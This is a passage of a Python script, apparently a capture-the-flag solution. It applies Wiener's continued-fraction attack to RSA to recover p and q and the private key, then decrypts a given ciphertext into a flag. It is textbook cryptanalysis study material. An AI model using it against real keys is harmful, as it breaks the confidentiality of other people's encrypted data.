109687016872270895485002266970328712710286894269700902397167363980261414713520289185733988489249689544386122785160267207726938916283070886632648506845942355973707843524843601791935989196521515362641012890949012806874239146986434010907679833739235439641970444255192335936390330185114634466512110682757108170303 40 | c = 95417048455606507206344555772522388669483613888347553614999898346097063082564960534143412714175496839814163484993167584876285328542038828829471182631204991424293520967432055502995782228891541107492929962249088449543437905078172770522604827502428360779940479314653358332616588023267286852819042394155188966503 41 | 42 | 43 | 44 | 45 | cf = cf_expansion(e,n) 46 | cons = convergents(cf) 47 | 48 | for k,d in cons: 49 | if k == 0: 50 | continue 51 | phi = (e*d - 1)//k 52 | p = Symbol('p', integer=True) 53 | roots = solve(p**2 + (phi - n - 1)*p + n, p) 54 | if len(roots) == 2 and roots[0]*roots[1] == n: 55 | print('found p and q') 56 | print('#########################') 57 | p = roots[0] 58 | q = roots[1] 59 | break 60 | 61 | phi = (p-1)*(q-1) 62 | d = inverse(e,phi) 63 | flag = pow(c,d,n) 64 | 65 | print(f'The flag is : {bytearray.fromhex(hex(flag)[2:])}') --------------------------------------------------------------------------------